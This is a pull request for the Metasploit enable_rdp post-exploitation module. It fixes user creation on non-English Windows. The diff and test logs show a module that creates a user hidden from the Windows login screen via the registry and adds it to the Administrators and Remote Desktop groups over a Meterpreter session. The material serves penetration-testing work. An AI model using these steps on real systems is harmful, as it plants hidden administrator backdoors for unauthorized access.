### PR TITLE
Fix #3852, make enable_rdp work with other languages

### DIFF
--- a/modules/post/windows/manage/enable_rdp.rb
+++ b/modules/post/windows/manage/enable_rdp.rb
@@ -138,7 +138,7 @@ class Metasploit3 < Msf::Post
         print_status "\tHiding user from Windows Login screen"
         hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'
         registry_setvaldata(hide_user_key,username,0,"REG_DWORD")
-        file_local_write(@dest,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
+        file_local_write(cleanup_rc,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
         print_status "\tAdding User: #{username} to local group '#{admin}'"
         cmd_exec("cmd.exe","/c net localgroup #{admin}  #{username} /add")
         print_status "You can now login with the created user"


### PR DESCRIPTION
- Tried to retrieve `%ERRORLEVEL%` after the `net user /add` command, unfortunately it's 0 when the command works or fails. So doesn't look like an option here.
- Decided to add a second check after the original one. And it's to check if the user is listed with a `net user` command. In order to work, a check has been also added before the `net user /add` command. If the user already exists, hasn't sense to try to add it (it will fail).
## Verification
- [x] Install Windows 7 (other language than English). I've used spanish.
- [x] Get a meterpreter session with administrator privileges
- [x] Try to run enable_rdp with "ENABLE false" and "USERNAME" and "PASSWORD" set. Use a username already existent in the system. It should fail:

```
msf post(enable_rdp) > run

[*] Setting user account for logon
[*]     Adding User: test4 with Password: test1
[-]     The user test4 already exists
[*] For cleanup execute Meterpreter resource file: /Users/jvazquez/.msf4/loot/20141212172832_default_172.16.158.133_host.windows.cle_120451.txt
[*] Post module execution completed
```
- [x] Try to run enable_rdp with "ENABLE false" and "USERNAME" and "PASSWORD" set. Use a non existent username. The module should work correctly:

```
msf post(enable_rdp) > run

[*] Setting user account for logon
[*]     Adding User: test6 with Password: test1
[*]     Adding User: test6 to local group 'Usuarios de escritorio remoto'
[*]     Hiding user from Windows Login screen
[*]     Adding User: test6 to local group 'Administradores'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /Users/jvazquez/.msf4/loot/20141212173943_default_172.16.158.133_host.windows.cle_334145.txt
[*] Post module execution completed
```
